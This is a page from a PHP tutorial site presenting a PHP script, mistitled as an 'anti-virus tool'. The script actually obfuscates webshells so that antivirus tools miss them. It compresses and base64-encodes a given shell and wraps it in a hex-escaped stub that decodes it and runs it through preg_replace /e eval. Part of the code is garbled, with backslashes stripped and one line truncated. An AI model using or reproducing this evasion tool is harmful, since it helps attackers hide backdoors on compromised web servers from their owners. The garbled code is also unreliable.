Home >Backend Development >PHP Tutorial >The code of webshell super anti-virus tool written in PHP

The code of webshell super anti-virus tool written in PHP

WBOY
WBOYOriginal
2016-07-25 09:03:341561browse
  1. /*
  2. Title: PHP shell nokill T00L
  3. Blog: exploit-db.blogcn.com
  4. */
  5. error_reporting(0);
  6. @ini_set('memory_limit','-1');
  7. set_time_limit(0);
  8. $toolname="$argv[0]";
  9. if ($argc<2) {
  10. baner($toolname);
  11. die;
  12. }
  13. $input_file= trim($argv[1]);
  14. $output_file='nokill_'.$input_file;
  15. if (file_exists($input_file)) {
  16. No_kill_c0de($input_file,$output_file);
  17. echo "PHP shell nokill T00Lrn";
  18. echo "Blog: exploit-db.blogcn.comrn";
  19. echo "Input: {$input_file}rn";
  20. $file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file;
  21. echo "[+] Generate success!rn";
  22. echo "Saved to {$file_full_path}"."rn";
  23. } else {
  24. echo "PHP shell nokill T00Lrn";
  25. echo "Blog: exploit-db.blogcn.comrn";
  26. die("[-] Failed ! The File $input_file does not exist");
  27. }
  28. function No_kill_c0de($input_file,$output_file){
  29. $no_whitespace=php_strip_whitespace($input_file);
  30. $no_php_tag=trim(trim(trim($no_whitespace,'');
  31. $enfile=base64_encode(gzdeflate($no_php_tag));
  32. $shellcode="x3cx3fx70x68x70xdxa";
  33. $shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."xdxa";
  34. $shellcode.="x24x62x3dx73x74x72x5fx72x65x70x6cx61x63x65x28x27x66x27x2cx22x22x2cx22x62x66x61x66x73x66x65x66x36x66x34x66x5fx66x66x64x66x66x65x66x66x63x66x66x6fx66x66x64x66x66x65x66x22x29x3bxdxax24x67x3dx73x74x72x5fx72x65x70x6cx61x63x65x28x27x58x27x2cx27x27x2cx27x67x58x58x7ax58x58x69x58x58x6ex58x58x58x58x66x58x58x58x6cx58x58x61x58x58x58x74x58x58x58x58x58x65x27x29x3bxdxax70x72x65x67x5fx72x65x70x6cx61x63x65x28x27x5cx27x61x5cx27x65x69x73x27x2cx27x65x27x2ex27x76x27x2ex27x61x27x2ex27x6cx27x2ex27x28x24x67x28x24x62x28x24x65x6ex66x69x6cx65x29x29x29x27x2cx27x61x27x29x3bxdxa";
  35. $shellcode.="x3fx3e";
  36. file_put_contents("$output_file",$shellcode);
  37. }
  38. function baner($toolname){
  39. echo "PHP shell nokill T00Lrn";
  40. echo "Blog: exploit-db.blogcn.comrn";
  41. echo "Usage: {$toolname} phpwebshellrn";
  42. }
  43. ?>
复制代码


Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn